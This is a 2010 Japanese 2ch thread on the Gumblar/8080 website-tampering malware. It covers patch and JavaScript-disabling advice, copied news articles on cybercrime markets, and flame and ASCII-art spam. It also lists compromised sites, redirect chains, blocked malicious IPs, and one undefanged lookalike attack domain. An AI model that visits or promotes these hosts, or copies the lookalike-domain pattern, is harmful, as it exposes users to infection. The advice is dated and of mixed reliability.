【Gumblar/GENO】Web改竄ウイルス総合スレ7【8080】
1 :
名無しさん@お腹いっぱい。 :
2010/03/08(月) 23:48:04 改ざんされたWebページを経由して感染するウイルスの情報・対策スレです
感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***
*** 通報したら重複を防ぐために宣言すること ***
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ6【8080】
http://pc11.2ch.net/test/read.cgi/sec/1266494350/
2 :
名無しさん@お腹いっぱい。 :2010/03/08(月) 23:49:37
Gumblar().x、8080系ウイルス対処法。 行っておくべき事項を箇条書きにしました。 細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。 (1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする (2)Adobe Readerを最新版に更新する (3) Adobe ReaderのAcrobat JavaScriptを無効に設定 (4) JRE(Java Runtime Environment)を最新版に更新する (5) Flash Playerを最新版に更新する (6) QuickTimeを最新版に更新する (1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。 攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。 Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。 Acrobat JavaScriptを無効にする方法は以下の通り。 (1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択 (2)「分類」の中の「JavaScript」を選択 (3)「Acrobat JavaScriptを使用」のチェックをクリア (4)「OK」ボタンを押す ※サイトを運営されている方は、さらに次のことも実施していただきたい。 (1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する (2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、 ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
3 :
名無しさん@お腹いっぱい。 :2010/03/08(月) 23:50:19
4 :
名無しさん@お腹いっぱい。 :2010/03/08(月) 23:53:41
ブラウザのjavascriptを無効にする(しっかり対策してれば不要だが、念のためjavascriptはOFFを推奨) ※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります ●InternetExplorer ツール→インターネットオプション→セキュリティ→ レベルのカスタマイズ→スクリプトのとこ全部無効にチェック ※ActiveXもOFF ●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す ●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す ●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→ デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す ●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す ※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション もしくはLunascape5を使うといいようです。 ●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
5 :
名無しさん@お腹いっぱい。 :2010/03/08(月) 23:58:27
6 :
名無しさん@お腹いっぱい。 :2010/03/08(月) 23:59:31
以上でテンプレ終了。
7 :
1-6 :2010/03/09(火) 00:05:26
>>2 修正
Gumblar().x、8080系ウイルス対処法。
↓
Gumblar(.x)、8080系ウイルス対処法。
変なとこでみすった・・・orz
つか
>>1 の*** 通報したら重複を防ぐために宣言すること ***って要らないでしょう
1人が通報したぐらいじゃ動かない所もある訳だし
1.ロシア(27.89%)
2.中国(26.52%)
3.米国(9.98%)
4.ブラジル(6.77%)
5.ウクライナ(5.45%)
6.英国(5.34%)
7.フランス(3.81%)
8.ドイツ(2.41%)
9.スウェーデン(1.6%)
10.スペイン(1.37%)
セキュリティ - ZDNet Japan
http://japan.zdnet.com/news/sec/story/0,2000056194,20367817,00.htm セキュリティソフトウェアメーカーのPC Toolsによれば、
マルウェアのロシア発のマルウェアの割合は27.9%。これに対して中国の割合は26.5%。過去の調査では
世界2位になってしまった米国は今回、3位(10%弱)となった。
PC Toolsは、マルウェアをばらまく犯罪者集団Russian Business Networkが消滅したにも関わらず、ロシア
の生産量が落ちていないことを指摘している。
PC ToolsのマルウェアアナリストSergei Shevchenko氏は声明で「Russian Business Networkがいなくなった
ところに、ほかのマルウェアディストリビュータが入り込んでいる」と述べる。「結果として、過去にないくらい
多くのウイルスやスパイウェアがロシアから出てきている。そして、マルウェアの複雑さが増している」
(Shevchenko氏)
さらに、今はなきRussian Business Networkのほうが、その代わりに出てきた小規模な組織よりも追跡しや
すかったとShevchenko氏は言う。「現在は、ロシアのマルウェアホスティングサービスが、マレーシアや中国、
パナマ、シンガポール、タイ、トルコ、インドのサーバに目を向けている」
12 :
名無しさん@お腹いっぱい。 :2010/03/09(火) 07:03:14
@IT - アットマーク・アイティ 2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html カスペルスキーがサイバー犯罪の最新動向を説明
Twitterのアカウント、闇市場で1000ドルで売買も
フォロワー数やアカウントの利用スタイルによって価格は異なるが、
Twitterのアカウントは闇市場で1アカウントあたり500ドルや1000ドルで売買
されている――。そんなショッキングな数字を挙げて、最新のサイバー犯罪
の潜在的危険性について警鐘を鳴らすのは、ロシアのセキュリティ企業、カ
スペルスキーのセキュリティ研究者、ドミトリー・ベストゥージェフ氏だ。
カスペルスキーは2010年1月28日にモスクワで記者向けの説明会を開
催。この中でベストゥージェフ氏は「あなたの値段はいくら?」(How much do
you cost?)と題した講演を行い、闇市場の生々しいデータや動向について
語った。ベストゥージェフ氏の講演を中心に、同社のセキュリティ専門家の
話をお伝えする。
13 :
名無しさん@お腹いっぱい。 :2010/03/09(火) 07:04:10
@IT - アットマーク・アイティ 2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html なぜブラジルに多いのか?
サイバー犯罪者が集まる闇市場は、一般の市場とまったく同様に市場間の競
争や、価格決定のメカニズムが機能する売買市場となっている。売買の「場」と
なるWebサイトも、ちょうど広場やストリートで非合法の物品を売買するのと同様
に、常に各地の警察当局やISPとイタチごっこを繰り返している。
新興国のISPを中心に、犯罪者は集散を繰り返し、メールアカウント、クレジット
カード番号、SNSアカウントなどを売買しているという。ホストしているISPが闇市
場を強制的にシャットダウンすることもあるが、問題はサイバー犯罪関連の法整
備が遅れているために、こうした犯罪行為に対するリスクが低くなっているケース
があることだという。例えば、銀行のアカウントやクレジットカード情報を盗み出す
「Trojan-Bankers」と呼ばれるマルウェアの発信源のトップはブラジルが26%でダ
ントツに高いが、この背後には「1931年に制定された法律で処理しているため、
初犯は無罪放免。2度目にようやく投獄される」(ベストゥージェフ氏)という事情が
あるという。
捕捉されるリスクが低いことに加えて、高度に分業が進んでいることも、サイバー
犯罪に手を染める人が後を絶たない理由だ。コードを書くだけの人、ボットネットを
レンタルする人、マルウェアやスパムをばらまいてアカウントを集める人、実際に
銀行口座からお金を引き出す人、マネーロンダリングをする人、こうした人々を引
き合わせるオーガナイザーなどというように役割が細分化されている。コードだけ
書く人は、被害者の顔を見ることもないので、犯罪という意識も希薄になりやすい。
14 :
名無しさん@お腹いっぱい。 :2010/03/09(火) 07:04:53
@IT - アットマーク・アイティ 2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html 偽アンチウイルスソフトの年間被害額は1億5000万ドル
カスペルスキーのような世界的セキュリティ企業ですら、具体的な犯罪者像や正
確な市場規模は把握していないというが、サイバー犯罪者の多くは、暴力や麻薬
取引に関係する「犯罪者」と異なり、見るからに犯罪者の風貌ではないのではない
か、という。1つの仮説は、ITのスキルはあっても職がない途上国や新興国の若者
が関与しているケースが多いのではなか、というもの。ブラジルの事例でこれが確
認されたこともあるという。
闇市場の規模については、例えば近年被害が急増している「Fake AV」と呼ばれる
偽アンチウイルスソフトで、FBIへ寄せられた苦情を元に1億5000万ドルの被害額と
いう試算があるという。Fake AVに感染したPCにはポップアップ画面で多数のウイル
スに感染していると警告が出て、ウイルスの駆除のために正式版にアップグレード
するよう促される。Fake AVの画面は正当なアンチウイルスソフトのように見え、価格
も妥当。多くの人が被害にあっている。このFake AVは300種程度の存在が確認され
ており、そこから「最低でも1万人規模の犯罪者が関与している可能性がある」(イギ
リス担当シニア・リージョナル・リサーチャー デイビッド・エム氏)という。
15 :
名無しさん@お腹いっぱい。 :2010/03/09(火) 07:05:34
@IT - アットマーク・アイティ 2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html 警戒レベルが低いSNSのアカウントには高い価値
闇市場でやり取りされる「情報」の価格はさまざまだ。例えば「クレジットカード番号
は、国やカード会社によって価格は違う」(ベストゥージェフ氏)といい、アメリカ在住者
のVISA、マスターカードなら1件当たり2ドルだが、同じカードでも英国在住者のもので
あれば4ドル、オーストラリアなら5ドル、EUなら6ドルなどとなる。ゴールドカード、プラチ
ナカードになればさらに価格は上がる。銀行のアカウントであれば、残高やログインが
確認できているかなどの条件によって、価格は数ドルから数十ドルと変わる。
急激に狙われるようになっているのがSNSアカウントだ。カスペルスキーの調査によ
れば、2008年に約3万程度確認されていたSNSをターゲットにしたマルウェアは、2009
年に約6万と倍増したという。SNSは知人、友人、家族など信頼できる人を中心につな
がっていることが多いため、警戒感がない利用者が多い。
このため、例えば5000ユーザーとつながったFacebookのアカウントが300ドルで売ら
れるケースや、数百程度のフォロー、フォロワーを持つTwitterの女性アカウントが数百
ドルや1000ドルで売買されるケースも確認しているという。
16 :
名無しさん@お腹いっぱい。 :2010/03/09(火) 07:06:15
@IT - アットマーク・アイティ 2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html 今後は地理情報を利用し、自動化された攻撃も
高度に発達するSNSやWebサービスを利用して、今後は攻撃の「自動化」が進行する
だろう。こう予測するのは「なぜ災害はいつもあなたの都市を襲うのか?」(Why does the
disaster always strike your city?)と題した講演を行ったステファン・テナス氏だ。
SNSでは地理情報や個人の嗜好といった情報を共有し、これが効率的なターゲット広告
というイノベーションを生み出す土壌になっているが、これは同時にサイバー犯罪者たち
にとっても利用価値の高い情報だ。
例えば、地理情報。ユーザーの住む場所を取得し、偽のニュースサイトに掲載する速報
に、あたかもそのユーザーが住む都市で爆破事件が起こっているかのように見せることが
可能だろうという。見ている全員が、それぞれ都市名の部分だけをすり替えられたニュース
を読む。さらに、Google翻訳のAPIを利用して都市名を英語名で埋め込むようなこともできる。
Koobfaceと呼ばれるマルウェアは、マルウェアをダウンロードさせるWebサイトへのリンク
が張られたメッセージを、Facebookのユーザーになりすまして投稿する。これをクリックした
Facebookの「友人」らは、偽のFlashプラグインへのアップデートを促されるという。このとき、
上記のような偽ニュースが使われれば、早く映像を見たいという気持ちからプラグインをダウ
ンロードする確率は上がるだろう。
現在、SNSで広がる攻撃は、初心者ユーザーをターゲットにしていて初歩的なソーシャル
・エンジニアリングを使っているものが多いという。それでも十分に効果があるからだ。カス
ペルスキーでは、2010年にはこうした攻撃の高度化や自動化が進むと見ているという。また、
モバイル端末を狙ったモバイルボットネットの登場も時間の問題だろうと考えているという。
17 :
名無しさん@お腹いっぱい。 :2010/03/09(火) 07:06:56
@IT - アットマーク・アイティ 2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html 一般的なインターネットユーザーの値段:920ドル
従来、サイバー犯罪といえば銀行口座のパスワードやクレジットカード番号など直接的に
換金可能な情報が中心だった。このため、オンラインショッピングやオンラインバンキングを
利用しないPCユーザーは安全に感じているかもしれない。ところがベストゥージェフ氏は、
犯罪者にとっては狙う価値がないユーザーはいないという。
オークションサイトやSNSのアカウントには価値があるし、アカウントが何もないとしても、ネ
ットワーク接続されたPCには犯罪者にとって利用価値がある。DDoS攻撃のボットネットとして
バルクで換金できるからだ。2009年10月から広がっているGumblarシステムも、いまや7万台
のサーバが感染した状態のまま超広帯域のボットネットを構成している。ホームPCが7万台の
ボットネットに比べて1000倍程度のDDoS攻撃の能力があることを意味する。一切人手を介さ
ずにサーバとクライアント間で巧みに自己拡大するGumblarは2009年12月に活動をやめて感
染拡大は止まっているが、大規模なDDoS攻撃に備えている可能性のほかに、闇市場で攻撃
インフラの売買を始めている可能性も考えられるという。
ベストゥージェフ氏は講演の最後に、簡単なフォームを使って、ユーザー1人当たりが持つ情
報の値段を弾き出してみせた。メールアカウント3つ、残高が3000ドルの銀行のアカウントが1つ、
Facebookのアカウントが1つ、ブロードバンド接続のPCは2台、などと標準的なインターネットユー
ザーの有益な情報を闇市場の価格を元に計算すると、実に920ドル。闇市場においてデジタル
データは想像以上の高値で取り引されているようだ。
18 :
名無しさん@お腹いっぱい。 :2010/03/09(火) 07:17:12
^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
※以上は人間への感染例です
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
ここも7スレ目で打ち止めだな、こりゃ…
良い意味でですか?
前スレで報告があったページで今もスクリプトが埋まってるのは少なくとも54 その中でgoogleセーフブラウジングが警告するのは18
>>21 IDの出ないセキュ板は荒れるからなあ
いっそインターネット板にでも移住するかね
とはいえ最近はアップデート以外の対策が難しくなってきているから
このスレの役目も終わりに近づいてるのかも知れんが
もう周知徹底してるから必要ないかも
1benpi●mecha-kawa●com 1kyujin●mecha-kawa●com 15kinyu01●kyashingoo●com 18kinrpg●com 21kinyu01●kyashingoo●com 21saimu04●manjusyage●com 34di●mecha-kawa●com 54wanwanmonogatari68●info/ brownie-mart●com camp●kanji2001●com e-risingsun●net ebook-style●com/modules/xfsection/index●php? ec●uuhp●com/~chillnet faac3020●cpinet●jp/ hanahaitatsu●com/ hout●kanji2003●com info0825●com/horihori jkjom●com joseiyodwife●com junkankangoshi●com/cat1039 kagoshima●cool●ne●jp/fantasy_17/ kateikyousi-turtle●com kei●keita-house●com/torabaayu_kansai kinzokunensuu●com kinzokunensuu●com/cat993 lblgs●com/ link●sfidalife●com manjusyage●com/ mizuhaitatsu●com park21●wakwak●com/~enyaraya/ pc-net●webinfo●jp pipestudio●net
seikakutest●net shaddytoriyosesite●livedoor●biz shogaishakoyo●com/ suemari●com/movie sunrise●2pg●in/suzukiucar/index2●html thismonky●com unmeideai●com www●1biyou●net www●avis●ne●jp/~muranaka/ www●borneomarathon●com/jpn/home●html www●dgnx●net/ www●g-mania●org www●gocha-mix●net/cgi-bin/blog/ www●hct●zaq●ne●jp/cpacs503/ www●jpdrag●com www●kadoma-c●com www●kidscorner●jp/main●php www●kikuyakikai●com www●oumc-obog●com/2008/01 www●pzaki●com www●ruco25●net www●sesica●co●jp www●shinnippo●co●jp/ssff/2006hiroshima/ www●sue-arc●com www●win-win777●com/karuizawa/ www12●plala●or●jp/atakashi/sk www13●plala●or●jp/metal-militia/ www2●odn●ne●jp/2711726/ www2●odn●ne●jp/2711726/index_02●html www4●ocn●ne●jp/~ikl/member/index●htm xn--com-r10es86d●jp/
63サイトのうち33サイトがデジロック
このような何ら対策を講じようとしないホスティングサービス屋は, しかるべきところに通報し行政指導されるべきだ
その行政が穴のあいた鯖使ってるから困る
34 :
コテハン :2010/03/09(火) 18:02:08
実は新コード来てるし・・・ //www●dd●iij4u●or●jp/~ceh3/span/juku/main●html 註:精神的ブラクラに注意w 「.substr」が目立つ ※チェッカー3は無反応。
>>34 こんな感じか
//bild-de.careerbuilder.com.bile-de.thew.ru:8080
37 :
コテハン :2010/03/09(火) 18:19:32
職場のPCで無謀な事はできんので、 帰宅後に発掘作業を再開する・・・ でも、残業がががorz
そうだ、googleにスパム報告すればいいんだ・・・
40 :
コテハン :2010/03/09(火) 20:04:24
一件だけ投下・・・ //www●kikuyakikai●com/index●html ←再発
IE5.01とIE8は影響を受けないのか
28-29に追加 bikebikekaitori●com
firefoxに移行したから IE削除するかな
Microsoft Updateするから残しとけ 自己責任で
狐でもマイクロソフトからあるアドオンをDLして有効化したらアップデート使えるよ?なんて名前のアドオンか忘れたけど 何時頃からかは知らんがEUのお偉いさん連中がWindowsにIEを初期付属してるのが法律違反だとかほざくからだろうけど
日本語で
スレ1からスレ5までに報告があったページで、今スクリプトが埋まってるURL coolfocus●jp/seminar/heartful jaguarracing●xf●cz/xmlrpc●php mogulclub●com/BANDS_AND_GIGS/index_CIARA●html s1●shard●jp/dreaming/ s1●shard●jp/dreaming/mitubishiucar/index●html shop●relax-living●net/bike11/ www●elmwoodguestcottage●com/ www●hakuchi●jp/57577/ www●hakuchi●jp/OTSUYA/ www●hervochapiteaux●be www●i-paradise5●jp/~simple/otona/index●php www●mfreep●com
また糞狐が釣ってるのか
Gumblar(.x)っぽいの //www●kiyasuisan●co●jp ↓ //gabler-bayreuth●de/cgi-bin/default●php ↓ //alicosrl●it/templates/403●shtml●php -- //gabler-bayreuth●de/ ↓ //pecsa●com●pl/ ↓ //seovisiongroup●com/ すっ飛ばしまくって→あふぃ=メシウマ?
日本語でおk
>>40 ウイルスバスターがブロック(キリッ
>>34 ウイルスバスター(笑)がスルー
大きなニュースが無いからつまらないな。 感染自体は広がってるんだが
感染を調べる一つの手段として セーフモードで起動してスタートアップに何ちゃらってやつと ファイル名を指定して実行→regeditどうたらっていうのがあったと思うのですが あのテンプレみたいの持ってる方いましたら貼ってもらえませんか?
そんなモンテンプレみなきゃ分からんレベルなら 感染してるかと思ったら素直に再インストしろ
>>57 そんなもんあっても1週間もあればウイルスのファイル名が変わるなんてざらだから役にたたん
普段から自動起動しているファイルを調べてないやつには判別もできん
素直にクリーンインスコしろ
60 :
名無しさん@お腹いっぱい。 :2010/03/12(金) 10:36:30
oimachi-chintai●com/sitemap/
まあ
>>57 のことだから
リカバリしてもまた感染するだろうなwww
//ggcomputer●com/index●html 「dT.prototype =」
株式会社ジェー・ディー・イー JDE www●jde-net●co●jp/engineering/index●php
何やってんのマカフィー
67 :
名無しさん@お腹いっぱい。 :2010/03/12(金) 19:51:18
いつもどおりソースコードをコピペでパクれよ馬鹿フィー
マカフィー使ってる奴は情弱かnecユーザーかあどびの社員
アドビの社員は使ってないだろ 使ってるのはFlash Playerとか落としに行ったやつ
昔マカフィーのウィルススキャン使ってたらバグで受信トレイの中身全部消えて死にたくなった
昔のノートンでもそんなバグなかったか?
MSのでもあったろ
全然やらかした事のない セキュリティソフトなんか 無いんじゃないの?
これどうやって自分が感染してるか確かめるんだよ? 分からなきゃ何度クリーンインストールしても一緒じゃねえか
76 :
名無しさん@お腹いっぱい。 :2010/03/13(土) 01:50:36
いつもと違うプロセスがたちあがってりゃわかるだろ そんなんで逆切れしてっからダメなんだ
反論は文章で
なんかもう騒ぐ人も下火になったなあ
騒いでも再改ざん繰り返す業者が多いからじゃない? しかも、対応しにくいように徐々にウィルス進化中
.htaccess改ざんに移行して見つけにくくなったのもあるんじゃない?
Evolution and threat of botnetでググれば学術記事が大量に見つかるけど 大学の研究ネタにもなってるとは知らなかったな
>>81 アンチウイルスソフトでも未対応のやつ多そう
なんにしろ対策してれば引っかからないし ほんとの0dayなんかほとんどない 情弱以外関係ない
,,-―--、 |:::::::::::::;;;ノ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ |::::::::::( 」 < なんにしろ対策してれば引っかからないし ノノノ ヽ_l | ほんとの0dayなんかほとんどない ,,-┴―┴- 、| ∩_ 情弱以外関係ない /,|┌-[]─┐| \ ( ノ______________ / ヽ| | 情 | '、/\ / / / `./| | 弱 .| |\ / \ ヽ| lゝ | | \__/ \ |  ̄ ̄ ̄ | ⊂|______| |l_l i l_l | | ┬ |
癇に障ったか情弱
情弱と言うか無知なだけ 0day攻撃がしばらく問題だったんだよ
それに未修正の脆弱性もいろいろあるし いつ攻撃されてもおかしくない
0dayの定義分かってないのか情弱
またいつ攻撃されてもおかしくないとか 現実的でないこといってびびってるのか LANけーぶるひっこぬけ
糞狐はいつ攻撃されてもおかしくないな ハイリスク報知だし
未だにIE6とか使ってるんだろうか
自治体関連掘り出していけばザックザック出てきそうだな。 どうせwindowsのパッチも当ててないし
96 :
名無しさん@お腹いっぱい。 :2010/03/13(土) 16:44:23
自治体はその程度なのに国は今の知ったか大臣主導で情報を共有化する気だけどね。
>>96 機密情報をShareで全力共有しそうだなw
某ボランティア団体で活動してるが、団体所有のVistaはSP1のまんまだし Adobe ReaderはVer.8のプレインストールのまま Adobe Flash Player に関しては推して知るべし つ〜かプリインストールのセキュリティソフト期限切れてるし...
大規模な情報流出しないと改善されなさそうだね。
>>98 Avastくらい入れてやれよ、ボランティアでw
それがねダンナ、かてて加えて 某福祉事務所のXP、SP2のまんまだし 当然Adobe関連はプレインスコのままだし それよりなによりファイアウォールもアンチウィルスすら入ってねーし で、そのPC使って障がい者相手のインターネット入門講座やるんだと
>>100 とりあえずMSE入れたら重くて使い物にならんしorz
アップデートていう概念自体を持ち合わせてないだけ
>>101 金をもらうためにPC+回線いれたのに
それ以上に金かけたくないってことだろ
こんなのがNPO法人になって金稼ぎしてるんだよww
新型来ないね
役所なんかもっとひどくてupdateしたりすると勝手にそんなことスンナって怒られるレベル。 去年のネットでできる確定申告なんて、 新しいjava捨ててわざわざ古いバージョン入れないと動かなかった。 判明するのに子1時間悩まされた。
そんなの役所にかぎらんだろ 勝手にされたら困る
こともある
まともに管理してるところなら多少遅くなってもUpdateする予定だから勝手にやると怒られる 管理してないところは金がかからなくて業務に支障がなければ「勝手にどうぞ」てな感じ 保守とセキュリティ対策は業務妨害とコストとしてしか見ないのが見識のない組織の現実
>>108 言葉足らずだった。
中途で役所のSEで入った友達の話。
あまりにも古い形式使っててセキュリティ的にヤバイって言って
議題に上げても一蹴。
『後から入ってきたくせに勝手にそんなことマンドクサそうなこと言い出すな!』
ってニュアンスだったそうな。
そうかそうか
>>100 ボランティアの人、あの警告音に驚くだろうなぁ・・・
avast5になって音変わったんじゃなかったっけ。
改ざんされた偽セキュリティソフトのWebページを踏んだ様で、PCを立ち上げると 「WARNING! 40 infections found!!!'」の表示が出て他へ他へ進めません。 Internet ExplorerやOutlook Expressすら立ち上げることができず困っています。 PCはだいぶ前のNEC VR770Cという一体型で、今になって使用書を良く読むと HDDに再セットアップ用データが入っていて再セットアップ用CD-ROMが作れた 様ですが、恥ずかしながらそれもしていません。 何とかこの哀れなPCを復活させる手はないでしょうか? 蛇足ながら、窓から投げ捨てるには高層マンションの25階で危険すぎるのです。
OS買って来て入れなおせ
力一杯床に叩き付けろ
/ ̄ ̄\ / \ ____ |:::::: | / \ . |::::::::::: | / \ |:::::::: |/ -━- -━- \ . |:::::::::::::: } | (__人__) | . ヽ:::::::::::::: } \ ` ⌒´ _/ ヽ:::::::::: ノ | \ /:::::::::::: く | | | | -―――――|:::::::::::::::: \-―┴┴―――――┴┴―― / ̄ ̄\ / \ ____ |:::::: | / \ . |::::::::::: | / \ |:::::::: |/ -━- -━- \ . |:::::::::::::: } | (__人__) | . ヽ:::::::::::::: } \ ` ⌒´ _/ ヽ:::::::::: ノ | \ /:::::::::::: く | | | | -―――――|:::::::::::::::: \-―┴┴―――――┴┴―― / ̄ ̄\ / \ ____ | | / \ . | -━- -━-| / \ |::::: (__人__) |/ -━- -━- \ . |::::::::` ⌒´ } | (__人__) | . ヽ:::::::::::: } \ ` ⌒´ _/ ヽ:::::::::: ノ | \ /:::::::::::: く | | | | -―――――|:::::::::::::::: \-―┴┴―――――┴┴――
起動時にF8とか連打して出るメニューにリカバリーとかなかったっけバリュースター
>>115 NECに電話して型番とシリアルナンバー伝えて有料リカバリディスク買えばいいんじゃ
>>115 お気に入りの型番なんだ
へぇ〜この板のアンチとおんなじジャン〜
ソフト入手しようと思ったらavast!が怒ったんだけど感染してる? Hardwaremania BlackBox ://blackbox●hardwaremania●com/en/home
>>113 ドラクエノレベルアップの音
にでも変えとけw
そういえば、一時期出てた不審なIPアドレスどうこうとかはまだあるの? 今、自分が遮断設定にしてるのは 67.212.81.67 67.215.237.98 67.215.238.194 67.215.246.34 91.215.156.74 91.215.156.75 91.215.156.76 94.76.250.73 94.229.65.174 193.104.12.20 195.24.76.250 210.51.166.228 216.45.48.66
ああほんと(苦笑)
感染してから小手先で情報送信防げるとかしてもね
>>126 0:基本的な対策(アップデート等)を行っておく ←必須
1:JAVAScriptをOFFしておく ←推奨
2:「:8080/」を含むURLを全て蹴る ←可能なら
お前ら8080って何て呼んでる? ・ハチゼロハチゼロ? ・ハチマルハチマル? ・ハッセンハチジュウ?
そこまでするなら flashとpdfリーダーアンインストールしろってこった
1はpdfビューアのJavaScriptをオフ、ならありじゃね?
このサイトは改竄されてるわ _,,.. -─-- 、, ,.::'´:::::::::::::::::::::::::::`::..、___ | _/ /::::::::/:::;:::::::i:::::::::;::::::::::::::く 〈7´ ピキーン ,'::::::::;'::::/:::/;ハ::::::;ハ:::::i:::::::ハ / |::::::::|:::::|::/メ、|__/ |_ィ!、::::!::! ∧ ‐ ─.|::::::::|:::::|7´ ∩ ∩Y|::|::| ─ヘ/ ':, /`ーw─'^ー ─ - |::::::::|::::八. り . り 〈::」:」 ∨ |::::::::|:::::|"" _ ",ハ| !::::::::|:::::|>,、 __,.. イ:::::| ,':::::::::|:::::|´ \_「`\:::|::::::| _________ ./:::::::::::;\ト、 }_X_{ .〉、:::::| // / /:::::::::::/ 、|\/ム`ァl/ \! // Tewinabook. / /:::::::::::;' ´ ̄/>‐-、 ./ >‐// / :::::::::::::/|. | | 、ン^'く::\ // / ──‐‐!、__|.」-‐'ーヘ‐'─'` ー//________/─── /l二二]O)_l王l_l三l__oOン ヽ、_____ノ
キモイもん貼るなよ
キモイ顔の奴はレスするなよ
じゃあ2ch動かなくなるじゃん
.substr連発型 //www●w-com●jp/ チェッカー3は未対応だが・・・作者殿はどこ?
www●w-com●jp ↓ /1home/?S=D /2company/?S=D /2company/?D=A /3business/?N=A /5reference/?N=D /5reference/?M=D /5reference/?N=A /5reference/?S=D
飽きたので開発終了です
スレチで申し訳ないんだけど、今使ってるフリーのアンチウィルスってガンブラーとか8080には弱いみたいだから、これを期に有償ソフトに変えようかと思ってるんだけどそれにするか悩む
AV-TEST.orgでいつも優秀で、ヒューリスティックも高性能なG Data、
AV-TESTでは二番目ながらかなり高性能なマカフィー、
AV-T(ryでは上位3位には入らないけど、
ttp://honeywhales.com/では圧倒的に高性能なノートン まぁぶっちゃけ新種の対応には厳しいからどれでもダメなんだろうけどw
一般的にはG Dataを選ぶんだろうけど、gredAVアクセラレータとは共存できないみたいだし、無難にマカフィーでも良いけど除外設定できないし、何よりhoneywhalesの結果が引っかかる
確かにhoneywhalesの地図にあるVirusTotalの結果を見るとマカフィーやG Dataでは検出できなくてノートンでは検出できるってものが多いんだよね
